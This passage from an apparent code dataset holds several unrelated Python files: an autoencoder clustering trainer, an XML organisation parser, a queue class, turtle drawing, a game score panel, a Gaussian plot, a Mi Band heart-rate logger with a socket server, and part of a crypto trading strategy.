datasets.ImageFolder(root=data_train_path,\n transform=transforms.Compose([\n transforms.Resize((256,128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5)),\n ]))\ntrain_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\ntest_dataset = datasets.ImageFolder(root=data_test_path,\n transform=transforms.Compose([\n transforms.Resize((256,128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5)),\n ]))\ntest_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\n## Accuracy\nnmi = normalized_mutual_info_score\ndef acc(y_true, y_pred):\n y_true = y_true.astype(np.int64)\n assert y_pred.size == y_true.size\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n ind = linear_sum_assignment(w.max() - w)\n ind = np.asarray(ind)\n ind = np.transpose(ind)\n return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size\n\n## Convolutional autoencoder\nclass AutoEncoderConv(nn.Module):\n def __init__(self, num_classes, num_features):\n super(AutoEncoderConv, self).__init__()\n self.num_features = num_features\n self.fc1 = nn.Linear(64*8*4, 2048)\n self.fc2 = nn.Linear(2048, 256)\n if self.num_features == 64:\n self.fc3 = nn.Linear(256, 64)\n self.de_fc1 = nn.Linear(64, 256)\n self.de_fc2 = nn.Linear(256, 2048)\n self.de_fc3 = nn.Linear(2048, 64*8*4)\n\n self.encoder = nn.Sequential(\n # Input : 3*256*128\n nn.Conv2d(3, 8, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 8*128*64\n\n nn.Conv2d(8, 16, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 16*64*32\n\n nn.Conv2d(16, 16, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 16*32*16\n\n nn.Conv2d(16, 32, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 32*16*8\n\n nn.Conv2d(32, 64, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 64*8*4\n )\n\n self.decoder = nn.Sequential(\n # 64*8*4\n\n nn.ConvTranspose2d(64, 32, 2, stride=2),\n nn.ReLU(True),\n # 32*16*8\n\n nn.ConvTranspose2d(32, 16, 2, stride=2),\n nn.ReLU(True),\n # 16*32*16\n\n nn.ConvTranspose2d(16, 16, 2, stride=2),\n nn.ReLU(True),\n # 16*64*32\n\n nn.ConvTranspose2d(16, 8, 2, stride=2),\n nn.ReLU(True),\n # 8*128*64\n\n nn.ConvTranspose2d(8, 3, 2, stride=2),\n nn.ReLU(True)\n # 3*256*128\n )\n\n self.alpha = 1.0\n self.clusterCenter = nn.Parameter(torch.zeros(num_classes,num_features))\n self.pretrainMode = True\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform(m.weight)\n\n def setPretrain(self,mode):\n self.pretrainMode = mode\n\n def updateClusterCenter(self, cc):\n self.clusterCenter.data = torch.from_numpy(cc)\n\n def getTDistribution(self, x, clusterCenter):\n xe = torch.unsqueeze(x,1).cuda() - clusterCenter.cuda()\n q = 1.0 / (1.0 + (torch.sum(torch.mul(xe,xe), 2) / self.alpha))\n q = q ** (self.alpha + 1.0) / 2.0\n q = (q.t() / torch.sum(q, 1)).t() #due to divison, we need to transpose q\n return q\n\n def forward(self, x):\n # -- encoder --\n y = self.encoder(x)\n y = F.relu(self.fc1(y.view(y.size(0), -1)))\n y = F.relu(self.fc2(y))\n if self.num_features == 64:\n y = F.relu(self.fc3(y))\n y_e = y\n\n # if not in pretrain mode, we only need encoder\n if self.pretrainMode == False:\n return y, self.getTDistribution(y, self.clusterCenter)\n\n # -- decoder --\n if self.num_features == 64:\n y = F.relu(self.de_fc1(y))\n y = F.relu(self.de_fc2(y))\n y = F.relu(self.de_fc3(y))\n y_d = self.decoder(y.view(y.size(0), 64, 8, 4))\n return y_e, y_d\n\n## Controlling the training process of DEC\nclass DEC:\n def __init__(self,n_clusters,n_features, alpha=1.0):\n self.n_clusters = n_clusters\n self.n_features = n_features\n self.alpha = alpha\n \n @staticmethod\n def target_distribution(q):\n weight = q ** 2 / q.sum(0)\n return Variable((weight.t() / weight.sum(1)).t().data, requires_grad=True)\n def logAccuracy(self,pred,label):\n print(' '*8 + '|==> acc: %.4f, nmi: %.4f <==|'\n % (acc(label, pred), nmi(label, pred)))\n @staticmethod\n def kld(q,p):\n res = torch.sum(p*torch.log(p/q),dim=-1)\n return res\n \n def validateOnCompleteTestData(self,test_loader,model):\n model.eval()\n for i,d in enumerate(test_loader):\n if i == 0:\n to_eval = model(d[0].cuda())[0].data.cpu().numpy()\n true_labels = d[1].cpu().numpy()\n else:\n to_eval = np.concatenate((to_eval, model(d[0].cuda())[0].data.cpu().numpy()), axis=0)\n true_labels = np.concatenate((true_labels, d[1].cpu().numpy()), axis=0)\n\n #print(\"to_eval.shape : {}\".format(to_eval.shape))\n #print(\"true_labels.shape : {}\".format(true_labels.shape))\n #print(\"len(np.unique(true_labels) is {}\".format(len(np.unique(true_labels))))\n \n km = KMeans(n_clusters=len(np.unique(true_labels)))\n y_pred = km.fit_predict(to_eval)\n \n return acc(true_labels, y_pred), nmi(true_labels, y_pred)\n \n def pretrain(self, dataloader, num_epochs):\n model = AutoEncoderConv(self.n_clusters, self.n_features).cuda()\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n best_loss = 1.0\n best_epoch = 0\n\n for epoch in range(num_epochs):\n for data in tqdm(dataloader):\n img, _ = data\n img = Variable(img).cuda()\n # ===================forward=====================\n _, output = model(img)\n loss = criterion(output, img)\n # ===================backward====================\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # ===================log========================\n if epoch % 2 == 0:\n save_image(img, save_img_path + \"image_{}.png\".format(epoch))\n save_image(output, save_img_path + \"g_image_{}.png\".format(epoch))\n\n if loss.item() < best_loss:\n best_loss = loss.item()\n best_epoch = epoch+1\n torch.save(model.state_dict(), \"./log/pth/best_loss_\"\n + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\")\n\n print(\"epoch [{}/{}], loss:{:.4f}, best loss:{:.4f}[{}/{}]\"\n .format(epoch+1, num_epochs, loss.item(), best_loss, best_epoch, num_epochs))\n with open(save_log_path + \"epoch\" + str(epoch+1), 'w') as f:\n f.write(\"epoch [{}/{}], loss:{:.4f}, best loss:{:.4f}[{}/{}]\"\n .format(epoch+1, num_epochs, loss.item(), best_loss, best_epoch, num_epochs))\n torch.save(model.state_dict(), \"./log/pth/\"\n + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\")\n\n torch.save(model.state_dict(), \"./log/pth/\"\n + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\")\n \n def clustering(self, mbk, x, model):\n model.eval()\n y_pred_ae,_ = model(x)\n y_pred_ae = y_pred_ae.data.cpu().numpy()\n y_pred = mbk.partial_fit(y_pred_ae) # seems we can only get a centre from batch\n self.cluster_centers = mbk.cluster_centers_ # keep the cluster centers\n model.updateClusterCenter(self.cluster_centers)\n def train(self,train_loader, test_loader, num_epochs):\n # this method will start training for DEC cluster\n best_epoch = 0\n best_nmi = 0.0\n model = AutoEncoderConv(self.n_clusters, self.n_features).cuda()\n model.load_state_dict(torch.load(log_path))\n model.setPretrain(False)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n print('Initializing cluster center with pre-trained weights')\n mbk = MiniBatchKMeans(n_clusters=self.n_clusters, batch_size=batch_size)\n got_cluster_center = False\n for epoch in range(num_epochs):\n for data in tqdm(train_loader):\n img, _ = data\n img = Variable(img).cuda()\n optimizer.zero_grad()\n # step 1 - get cluster center from batch\n # here we are using minibatch kmeans to be able to cope with larger dataset.\n if not got_cluster_center:\n self.clustering(mbk, img, model)\n if epoch > 1:\n got_cluster_center = True\n else:\n model.train()\n # now we start training with acquired cluster center\n feature_pred,q = model(img)\n # get target distribution\n p = self.target_distribution(q)\n kld_loss = self.kld(q,p).mean()\n kld_loss.backward()\n optimizer.step()\n \n if got_cluster_center:\n acc, nmi = self.validateOnCompleteTestData(test_loader,model)\n if best_nmi < nmi:\n best_epoch = epoch+1\n best_nmi = nmi\n torch.save(model.state_dict(), \"./log/pth/best_nmi_\"\n + types + \"_dec_conv_d\" + num_features + \"_save_model.pth\")\n\n print('epoch [{}/{}], loss:{:.4f}, acc:{:.4f}, nmi:{:.4f}, *best_nmi:{:.4f}[{}/{}]'\n .format(epoch+1, num_epochs, kld_loss.item(), acc, nmi, best_nmi, best_epoch, num_epochs))\n with open(save_log_path + \"dec_epoch\" + str(epoch+1), 'w') as f:\n f.write(\"epoch [{}/{}], loss:{:.4f}, acc:{:.4f}, nmi:{:.4f}, *best_nmi:{:.4f}[{}/{}]\"\n .format(epoch+1, num_epochs, kld_loss.item(), acc, nmi, best_nmi, best_epoch, num_epochs))\n torch.save(model.state_dict(), \"./log/pth/\"\n + types + \"_dec_conv_d\" + num_features + \"_save_model.pth\")\n\nif __name__ == \"__main__\":\n dec = DEC(num_classes, num_features)\n dec.pretrain(dataloader, num_epochs)\n dec.train(train_loader, test_loader, num_epochs)\n","sub_path":"autoencoder/deep_embedding_clustering/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206753506","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport xml.etree.ElementTree as ET\n\nimport re\nfrom flask import current_app\n\n\ndef get_organisations_from_nif_idrettsraad_xml(xml_file_path):\n \"\"\"\n Parse given XML with organisations with organisation name, number and member counts.\n Returns a list of dictionaries to the same format\n as accepted by flod_organisation.\n @param xml_file_path\tProvide the file path to the XML file to be parsed\n @return list\t\tOrganisation dictionaries\n \"\"\"\n try:\n namespaces = {'xmlns': u'Orgoversikt_x0020_idrettsråd'}\n\n tree = ET.parse(xml_file_path)\n root = tree.getroot()\n\n organisation_elements = root.findall(\"xmlns:table1/xmlns:Detail_Collection/xmlns:Detail\",\n namespaces=namespaces)\n\n organisations = []\n for child in organisation_elements:\n organisation = {}\n\n try:\n organisation['name'] = child.attrib['DescribingName']\n\n try:\n organisation['org_number'] = int(child.attrib['organisationnumber'])\n except ValueError:\n # If normal parsing fails, we try to be clever\n current_app.logger.warn(\"Parsefeil for \" + str(child.attrib['organisationnumber']) + \". Forsøker igjen.\")\n organisation['org_number'] = parse_number_with_incorrect_format(child.attrib['organisationnumber'])\n current_app.logger.warn(\"Organisasjonsnummeret \" + str(child.attrib['organisationnumber']) + \" ble parset til \" + str(organisation['org_number']))\n\n organisation['num_members'] = int(child.attrib['AntMemb'])\n organisation['num_members_b20'] = int(child.attrib['AntMemb20'])\n organisations.append(organisation)\n\n except Exception as e:\n current_app.logger.error(\"Parsing av medlemsdata feilet for: \" + str(ET.dump(child)) + \" Feil: \" + str(e))\n\n return organisations\n\n except Exception as e:\n current_app.logger.error(\"Parsing av medlemsdata feilet: \" + str(e))\n return []\n\n\ndef parse_number_with_incorrect_format(my_string):\n '''\n If we have a string that should be parsed as a number, it may have been written with illegal string characters.\n We attempt to remove non-digit characters to form a number of the digit characters.\n This may very well throw an exception if it turns out that it is not parseable to an integer\n E.g. NO987342432MVA, 987 342 432 will be parsed to 987342432\n '''\n\n number_matches = re.findall(r\"(\\d+)\\D*\", my_string)\n number_string = ''.join(number_matches)\n return int(number_string)\n","sub_path":"flod_aktor_frontend/flod_aktor_frontend/xmlParser.py","file_name":"xmlParser.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"53917285","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 26 12:58:32 2018\r\n\r\n@author: swats\r\n\"\"\"\r\n\r\nclass Queue():\r\n def __init__(self):\r\n self.stack1=[]\r\n self.stack2=[]\r\n \r\n def push(self,item):\r\n self.stack1.append(item)\r\n \r\n def display(self):\r\n if self.stack1!=[] and self.stack2==[]:\r\n return self.stack1\r\n return self.stack2\r\n \r\n def pop(self):\r\n if self.stack1==[]:\r\n return 'No element in queue'\r\n else:\r\n while self.stack1 !=[]:\r\n self.stack2.append(self.stack1.pop())\r\n \r\n return self.stack2.pop()\r\n \r\n def search(self,x):\r\n while self.stack1!=[] or self.stack2!=[]:\r\n if x in self.stack1 or x in self.stack2:\r\n \r\n return {self.stack2.index(x)}\r\n else:\r\n return 'element not found'\r\n \r\n \r\n \r\nq=Queue()\r\nq.push(1)\r\nq.push(2)\r\nq.push(3)\r\nq.push(4)\r\nq.push(5)\r\nprint(q.display())\r\nprint(q.pop())\r\nprint(q.search(3))\r\nprint(q.display()) ","sub_path":"Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153712795","text":"from Utils.ViewPluginBase import ViewPluginBase\nfrom Utils.gui.FontProvider import FontProvider\nfrom Utils.ServiceLocator import ServiceLocator, ServiceNames\nfrom Utils.GameState import GameState\n\nclass DefaultScorePanel(ViewPluginBase):\n \"\"\"Plugin to draw the ScorePanel.\"\"\"\n def __init__(self):\n super().__init__()\n self._screenRect = self._screen.get_rect()\n self._fontColor = (0,0,0)\n self._status = ServiceLocator.getGlobalServiceInstance(ServiceNames.Gamestate)\n assert isinstance(self._status, GameState)\n\n\n def drawTextLabel(self, x, y, text, font=FontProvider.defaultFont(), color=(0,0,0)):\n label = font.render(text, 1, color)\n textPos = label.get_rect()\n textPos.left = x\n textPos.top = y\n self._screen.blit(label, textPos)\n return textPos\n\n def drawPlugin(self):\n pos = self.drawTextLabel(10, 10, \"Points: {0}\".format(self._status.points))\n pos = self.drawTextLabel(10, pos.bottom + 8, \"Energy: {0}\".format(self._status.energy))\n pos = self.drawTextLabel(10, pos.bottom + 8, \"Lifes: {0}\".format(self._status.lifes))\n\n pos = self.drawTextLabel(9, 9, \"Points: {0}\".format(self._status.points), color = (255,255,255))\n pos = self.drawTextLabel(9, pos.bottom + 8, \"Energy: {0}\".format(self._status.energy), color = (255,255,255))\n pos = self.drawTextLabel(9, pos.bottom + 8, \"Lifes: {0}\".format(self._status.lifes), color = (255,255,255))\n #return super().drawPlugin()\n","sub_path":"SimpleGame/SimpleGame/Src/Plugins/DefaultScorePanel.py","file_name":"DefaultScorePanel.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"374214758","text":"__author__ = 'zackory'\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nmu = np.array([40, 60])\nsigma = np.array([[100, 30], [30, 140]])\n\nsigmaInv = np.linalg.inv(sigma)\n# coeff = 1 / (2*np.pi*np.sqrt(np.linalg.det(sigma)))\ncoeff = 1\n\np = [[np.exp(-0.5*np.dot(np.dot(([i,j]-mu).T, sigmaInv), ([i,j]-mu))) for j in xrange(100)] for i in xrange(100)]\np = np.array(p)*coeff\n\n\nfig = plt.figure()\nax = fig.gca(projection='3d')\nX = np.arange(0, 100, 1)\nY = np.arange(0, 100, 1)\nX, Y = np.meshgrid(X, Y)\n# cmap = cm.Blues\ncmap = cm.cool\n# cmap = cm.winter\n# surf = ax.plot_surface(X, Y, p, rstride=1, cstride=1, cmap=cmap, linewidth=0, antialiased=False)\nsurf = ax.plot_surface(X, Y, p, rstride=2, cstride=2, cmap=cmap, alpha=0.4, linewidth=0, antialiased=False, edgecolors='#52b4f8')\n# ax.set_zlim(-1.01, 1.01)\n\nx = np.array([60, 30])\nax.plot([60, x[0]], [0, x[1]], alpha=0.8, c='k', linewidth=2)\nax.plot([100, x[0]], [30, x[1]], alpha=0.8, c='k', linewidth=2)\n# Plot line between points\nax.plot([x[0], x[0]], [x[1], x[1]], zs=[0, p[x[1], x[0]]], alpha=0.8, c='k', linewidth=2)\n\n# Plot point on 2D grid\nax.plot([x[0]], [x[1]], 'r.', alpha=0.7, markersize=20)\n# Plot point on gaussian distribution\nax.plot([x[0]], [x[1]], 'g.', zs=[p[x[1], x[0]]], alpha=1, markersize=20)\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\n# ax.zaxis.set_major_locator(LinearLocator(10))\n# ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\nfig.colorbar(surf, shrink=0.5, aspect=5)\n\nplt.show()\n","sub_path":"hrl_multimodal_anomaly_detection/scripts/multivariateGaussian.py","file_name":"multivariateGaussian.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"370312593","text":"import argparse\nimport subprocess\nimport time\nimport signal\nimport csv\nimport math\nimport socket\nfrom datetime import datetime\nfrom _thread import *\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.animation import FuncAnimation\nimport psutil\nimport collections\n\nfrom bluepy.btle import BTLEDisconnectError\n\nfrom constants import MUSICSTATE\nfrom miband import miband\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-m', '--mac', required=False, help='Set mac address of the device')\nparser.add_argument('-k', '--authkey', required=False, help='Set Auth Key for the device')\nparser.add_argument('-f', '--file', required=True, help='Set the output path to save heart rate data')\nparser.add_argument('-a', '--host', required=False, default='127.0.0.1', help='Set the host address to connect')\nparser.add_argument('-p', '--port', required=True, help='Set the port to connect to')\nargs = parser.parse_args()\n\n# Try to obtain MAC from the file\ntry:\n with open(\"mac.txt\", \"r\") as f:\n mac_from_file = f.read().strip()\nexcept FileNotFoundError:\n mac_from_file = None\n\n# Use appropriate MAC\nif args.mac:\n MAC_ADDR = args.mac\nelif mac_from_file:\n MAC_ADDR = mac_from_file\nelse:\n print(\"Error:\")\n print(\" Please specify MAC address of the MiBand\")\n print(\" Pass the --mac option with MAC address or put your MAC to 'mac.txt' file\")\n print(\" Example of the MAC: a1:c2:3d:4e:f5:6a\")\n exit(1)\n\n# Validate MAC address\nif 1 < len(MAC_ADDR) != 17:\n print(\"Error:\")\n print(\" Your MAC length is not 17, please check the format\")\n print(\" Example of the MAC: a1:c2:3d:4e:f5:6a\")\n exit(1)\n\n# Try to obtain Auth Key from file\ntry:\n with open(\"auth_key.txt\", \"r\") as f:\n auth_key_from_file = f.read().strip()\nexcept FileNotFoundError:\n auth_key_from_file = None\n\n# Use appropriate Auth Key\nif args.authkey:\n AUTH_KEY = args.authkey\nelif auth_key_from_file:\n AUTH_KEY = auth_key_from_file\nelse:\n print(\"Warning:\")\n print(\" This program requires the auth key. Please put your Auth Key to 'auth_key.txt' or pass the --authkey option with your Auth Key\")\n print()\n exit(1)\n \n# Validate Auth Key\nif AUTH_KEY:\n if 1 < len(AUTH_KEY) != 32:\n print(\"Error:\")\n print(\" Your AUTH KEY length is not 32, please check the format\")\n print(\" Example of the Auth Key: 8fa9b42078627a654d22beff985655db\")\n exit(1)\nelse:\n exit(1)\n\n# Convert Auth Key from hex to byte format\nAUTH_KEY = bytes.fromhex(AUTH_KEY)\n\n# stores the heart rate\nheartLog = []\nbpm = []\nneutralHR = 84\n\n# interval between each heart rate measure\nhrtInterval = 0\n# start time\nstrtTime = 0\n\n# sliding window for analysing data\nwindow = 100\n\n# stores all the clients\nclientList = []\n\n# saves the log\ndef saveLog():\n global heartLog\n \n # writing the heartLog\n with open(args.file, 'w') as csvfile:\n # creating a csv writer object\n csvwriter = csv.writer(csvfile)\n \n # writing the fields\n csvwriter.writerow(['crnt_time', 'interval', 'time', 'bpm', 'data_mean', 'norm_data', 'norm_median', 'data_entropy', 'norm_diff1'])\n \n # writing the data rows\n csvwriter.writerows(heartLog[1:])\n\n\n# functions related to heart rate analysis\ndef EMA(bpm, index, window, factor=0.04):\n if window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n\n dat = []\n dat.append(lst[0])\n\n for i in range(1, len(lst)):\n dat.append(factor*lst[i] + (1-factor)*dat[i-1])\n\n return dat[-1]\n\ndef median_hr(bpm, index, window):\n if window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n\n n = len(lst)\n lst.sort()\n\n if n % 2 == 0:\n median1 = lst[n//2]\n median2 = lst[n//2 - 1]\n return (median1 + median2)/2\n else:\n return lst[n//2]\n\ndef entropy(bpm, index, window):\n if window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n\n ent = 0\n for i in range(len(lst)):\n p = lst.count(lst[i]) / len(lst)\n ent += p * math.log2(p)\n\n return -ent\n\ndef diff1(bpm, index, window):\n if index == 0:\n return bpm[0]\n elif window > index:\n lst = bpm[:index+1]\n else:\n lst = bpm[index - window:index+1]\n \n diff = 0\n for i in range(1, len(lst)):\n diff += abs(lst[i] - lst[i-1])\n\n return diff / (len(lst)-1)\n\n\n\n\n# Needs Auth\ndef get_heart_rate():\n print ('Latest heart rate is : %i' % band.get_heart_rate_one_time())\n input('Press a key to continue')\n\ndef classify(log):\n hr = log[3]\n ent = log[7]\n if hr > 95 and ent > 32:\n return 'STRESS'\n elif hr > 95 and ent < 32:\n return 'EXCITED'\n elif hr < 75 and ent > 32:\n return 'LOW'\n else:\n return 'NORMAL'\n\ndef process_data(data, interval):\n global heartLog, strtTime, window, bpm, neutralHR, clientList\n\n crntTime = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n index = len(heartLog) \n\n data_mean = EMA(bpm, index, window, 0.04)\n norm_data = bpm[index] - neutralHR\n norm_median = median_hr(bpm, index, window) - neutralHR\n data_entropy = entropy(bpm, index, window)\n norm_diff1 = diff1(bpm, index, window)\n\n\n log = [crntTime, interval, time.time() - strtTime, data, data_mean, norm_data, norm_median, data_entropy, norm_diff1]\n heartLog.append(log)\n print(log)\n\n\n # send data to the clients\n if len(clientList) != 0:\n for client in clientList:\n # this is to ensure that even if one of the clients connections is \n # broken, the program continues to function.\n try:\n client.sendall(str.encode(classify(log)))\n except BrokenPipeError:\n continue\n\n \n # save the log in intervals so that all data in case of error\n if len(heartLog) % 50 == 0:\n print('saved')\n saveLog()\n\ndef heart_logger(data):\n global hrtInterval, bpm\n\n\n hrtInterval = time.time() - hrtInterval\n bpm.append(data)\n\n # start new thread to process data\n start_new_thread(process_data, (data, hrtInterval,))\n hrtInterval = time.time()\n\n \n\n# Needs Auth\ndef get_realtime():\n band.start_heart_rate_realtime(heart_measure_callback=heart_logger)\n input('Press Enter to continue')\n\n\n\n# adds client to the list\ndef addClient(bandSocket):\n global clientList\n\n for i in range(50):\n # connects to the client and adds them to the clientList\n client, address = bandSocket.accept()\n\n clientList.append(client)\n\n print(f'Connected to client {i} at ' + address[0] + ' : ' + str(address[1]))\n\n\n\n\n# visualization \nbpmPlot = collections.deque(np.zeros(window))\nentPlot = collections.deque(np.zeros(window))\n\n\n# function to update the data\ndef plot_function(bpm, ent):\n # get data\n bpmPlot.popleft()\n bpmPlot.append(bpm)\n entPlot.popleft()\n entPlot.append(ent) \n\n # clear axis\n ax.cla()\n ax1.cla() \n\n # plot heart rate\n ax.plot(bpmPlot)\n ax.scatter(len(bpmPlot)-1, bpmPlot[-1])\n ax.text(len(bpmPlot)-1, bpmPlot[-1]+2, \"{} bpm\".format(bpmPlot[-1]))\n ax.set_ylim(60,130) \n\n # plot entropy\n ax1.plot(entPlot)\n ax1.scatter(len(entPlot)-1, entPlot[-1])\n ax1.text(len(entPlot)-1, entPlot[-1]+2, \"{} bits\".format(entPlot[-1]))\n ax1.set_ylim(0,100)\n\n# define and adjust figure\nfig = plt.figure(figsize=(12,6), facecolor='#DEDEDE')\nax = plt.subplot(121)\nax1 = plt.subplot(122)\nax.set_facecolor('#DEDEDE')\nax1.set_facecolor('#DEDEDE')\n\n\n\n\n\n\n# exception handling\ndef signal_handler(sig, frame):\n print('saving the log')\n saveLog()\n \n print('\\nExiting')\n exit(0)\n\nif __name__ == \"__main__\":\n # ensure that the port number is an integer\n try:\n port = int(args.port)\n except ValueError:\n print(\"error: port number should be an integer\")\n exit(1)\n\n # initialize the socket\n bandSocket = socket.socket()\n\n # try establishing the connection\n try:\n bandSocket.bind((args.host, int(args.port)))\n except socket.error as e:\n print(str(e))\n exit(1)\n\n\n signal.signal(signal.SIGINT, signal_handler)\n\n success = False\n while not success:\n try:\n if (AUTH_KEY):\n band = miband(MAC_ADDR, AUTH_KEY, debug=True)\n success = band.initialize()\n else:\n band = miband(MAC_ADDR, debug=True)\n success = True\n break\n except BTLEDisconnectError:\n print('Connection to the MIBand failed. Trying out again in 3 seconds')\n time.sleep(3)\n continue\n except KeyboardInterrupt:\n print(\"\\nExit.\")\n exit()\n\n \n # listen to the connection requests\n bandSocket.listen()\n\n start_new_thread(addClient, (bandSocket,))\n\n\n # initializing time\n strtTime = hrtInterval = time.time()\n\n start_new_thread(get_realtime, ())\n\n while True:\n if heartLog:\n plot_function(heartLog[-1][3], heartLog[-1][7])\n plt.pause(1)\n\n plt.show()\n","sub_path":"band.py","file_name":"band.py","file_ext":"py","file_size_in_byte":9128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"337517183","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport math\nimport turtle\n\n# Create square\ndef square(t, length):\n for i in range(4):\n t.fd(length)\n t.lt(90)\n\n# Create polyline\ndef polyline(t, n, length, angle):\n for i in range(n):\n t.fd(length)\n t.lt(angle)\n\n# create polygon\ndef polygon(t, n, length):\n angle = 360.0/n\n polyline(t, n, length, angle)\n\n# create arc\ndef arc(t, r, angle):\n arc_length = 2 * math.pi * r * abs(angle) / 360\n n = int(arc_length / 4) + 3\n step_length = arc_length / n\n step_angle = float(angle) / n\n\n t.lt(step_angle/2)\n polyline(t, n, step_length, step_angle)\n t.rt(step_angle/2)\n\n# create circle\ndef circle(t, r):\n arc(t, r, 360)\n\n\nif __name__ == '__main__':\n bob = turtle.Turtle()\n\n radius = 100\n bob.pu()\n bob.fd(radius)\n bob.lt(90)\n bob.pd()\n circle(bob, radius)\n\n turtle.mainloop()","sub_path":"shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"8508463","text":"import random\n\nimport matplotlib.pyplot as plt\nfrom indicators.strategy_indicators import StrategyIndicators\n\nfrom logger import Logger\nfrom trade import Trade\n\n\nclass Strategy(object):\n def __init__(self, pair, capital, client=None, trading_fee=0, stop_loss=0):\n self.output = Logger()\n self.prices = []\n self.closes = [] # Needed for Momentum Indicator\n self.trades = []\n self.sells = []\n self.buys = []\n self.current_price = None\n self.timestamp = None\n self.current_close = None\n self.max_trades_at_once = 1\n self.indicators = StrategyIndicators\n self.profit = 0\n self.pair = pair\n self.reserve = capital\n self.client = client\n self.trading_fee = trading_fee\n self.stop_loss = stop_loss\n\n def tick(self, candlestick):\n op, clos = candlestick.open, candlestick.close\n\n # For backtest history, uniformly sample a random price between the opening and closing\n self.current_price = random.uniform(min(op, clos), max(op, clos))\n\n # Append a timestamp so we can add it to the plot\n self.timestamp = candlestick.time\n\n self.prices.append(self.current_price)\n\n self.evaluate_positions()\n self.update_open_trades()\n\n def live_tick(self, current_price):\n if self.client:\n self.current_price = current_price\n\n self.prices.append(self.current_price)\n\n # Make sure we have enough information to allow our indicators to work properly\n if len(self.prices) < 30:\n return\n\n # Reduce the maximum number of data points in memory to at most 100\n self.prices = self.prices[-100:]\n\n self.evaluate_positions()\n self.update_open_trades()\n\n def evaluate_positions(self):\n rsi = self.indicators.rsi(self.prices)\n nine_period = self.indicators.moving_average(self.prices, 9)\n fifteen_period = self.indicators.moving_average(self.prices, 15)\n bb1, bb2 = self.indicators.bollinger_bands(self.prices, k=2.)\n bb_diff = bb1 - bb2\n percent_diff = self.indicators.percent_difference(self.prices)\n # print(percent_diff)\n\n open_trades = [trade for trade in self.trades if trade.status == 'OPEN']\n\n if len(open_trades) < self.max_trades_at_once:\n # if self.current_price < nine_period and self.current_price < fifteen_period and rsi < 40:\n if self.current_price < nine_period and self.current_price < fifteen_period and rsi < 50 and self.current_price < bb1 - 0.8 * bb_diff and percent_diff > 0:\n assert self.reserve > 0\n\n if self.client:\n buy_at = self.current_price + 0.000001\n\n #### USE CLIENT TO SEND API REQUEST TO BUY THE TRADE AT A BIT HIGHER THAN THE LAST PRICE\n # ret = self.client.buy_limit(self.pair, self.reserve / buy_at, buy_at)\n ret = self.client.trade_buy(market=self.pair, order_type=\"MARKET\",\n quantity=self.reserve / self.current_price, time_in_effect=\"FILL_OR_KILL\")\n\n if ret['success'] is True:\n self.output.log(\"Buy order was placed with UUID: \" + ret['result']['uuid'], \"success\")\n new_trade = Trade(self.pair, buy_at, self.reserve, stop_loss=self.stop_loss)\n self.reserve = 0\n self.trades.append(new_trade)\n else:\n self.output.log(\"Buy order was unsuccessful. Reason: \" + ret['message'], \"error\")\n else:\n self.buys.append((self.timestamp, self.current_price))\n new_trade = Trade(self.pair, self.current_price, self.reserve * (1 - self.trading_fee), stop_loss=self.stop_loss)\n self.reserve = 0\n self.trades.append(new_trade)\n\n ### CHECK 